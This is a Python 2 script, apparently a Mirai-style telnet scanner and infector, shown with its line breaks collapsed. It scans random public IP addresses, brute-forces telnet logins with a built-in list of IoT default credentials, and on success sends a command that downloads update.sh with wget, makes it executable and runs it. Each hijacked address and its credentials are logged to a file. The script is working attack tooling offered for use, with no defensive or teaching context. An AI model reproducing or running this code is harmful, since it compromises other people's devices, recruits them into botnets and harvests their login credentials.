#!/usr/bin/python import threading import sys, os, re, time, random, socket, select if len(sys.argv) < 3: print "Usage: python "+sys.argv[0]+" " sys.exit() combo = [ "root:root", "root:", "admin:admin", "support:support", "user:user", "admin:", "admin:password", "root:vizxv", "root:admin", "root:xc3511", "root:888888", "root:xmhdipc", "root:default", "root:juantech", "root:123456", "root:54321", "root:12345", "root:pass", "ubnt:ubnt", "root:klv1234", "root:Zte521", "root:hi3518", "root:jvbzd", "root:anko", "root:zlxx.", "root:7ujMko0vizxv", "root:7ujMko0admin", "root:system", "root:ikwb", "root:dreambox", "root:user", "root:realtek", "root:00000000", "admin:1111111", "admin:1234", "admin:12345", "admin:54321", "admin:123456", "admin:7ujMko0admin", "admin:1234", "admin:pass", "admin:meinsm", "admin:admin1234", "root:1111", "admin:smcadmin", "admin:1111", "root:666666", "root:password", "root:1234", "root:klv123", "Administrator:admin", "service:service", "supervisor:supervisor", "guest:guest", "guest:12345", "guest:12345", "admin1:password", "administrator:1234", "666666:666666", "888888:888888", "tech:tech", "mother:fucker" ] threads = int(sys.argv[1]) output_file = sys.argv[2] def readUntil(tn, string, timeout=8): buf = '' start_time = time.time() while time.time() - start_time < timeout: buf += tn.recv(1024) time.sleep(0.1) if string in buf: return buf raise Exception('TIMEOUT!') def recvTimeout(sock, size, timeout=8): sock.setblocking(0) ready = select.select([sock], [], [], timeout) if ready[0]: data = sock.recv(size) return data return "" class router(threading.Thread): def __init__ (self, ip): threading.Thread.__init__(self) self.ip = str(ip).rstrip('\n') self.rekdevice="cd /tmp; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send def run(self): global fh username = "" password = "" for passwd in combo: if ":n/a" in passwd: password="" else: password=passwd.split(":")[1] if "n/a:" in passwd: username="" else: username=passwd.split(":")[0] try: tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tn.settimeout(0.37) tn.connect((self.ip,23)) except Exception: tn.close() break try: hoho = '' hoho += readUntil(tn, ":") if ":" in hoho: tn.send(username + "\r\n") time.sleep(0.1) hoho = '' hoho += readUntil(tn, ":") if ":" in hoho: tn.send(password + "\r\n") time.sleep(0.1) prompt = '' prompt += recvTimeout(tn, 40960) if "#" in prompt or "$": success = True else: tn.close() if success == True: try: tn.send(self.rekdevice + "\r\n") fh.write(self.ip + ":23 " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass //mirai fh.flush() print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip) time.sleep(10) tn.close() break except: tn.close() else: tn.close() except Exception: tn.close() def gen_IP(): not_valid = [10,127,169,172,192] first = random.randrange(1,256) while first in not_valid: first = random.randrange(1,256) ip = ".".join([str(first),str(random.randrange(1,256)), str(random.randrange(1,256)),str(random.randrange(1,256))]) return ip def worker(): while True: try: IP = gen_IP() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(0.37) s.connect((IP, 23)) s.close() thread = router(IP) thread.start() time.sleep(0.02) except: pass global fh fh = open(output_file, "a") for l in xrange(threads): try: t = threading.Thread(target=worker) t.start() except: pass print "Started " + str(threads) + " scanner threads! Press enter to stop." raw_input() os.kill(os.getpid(), 9)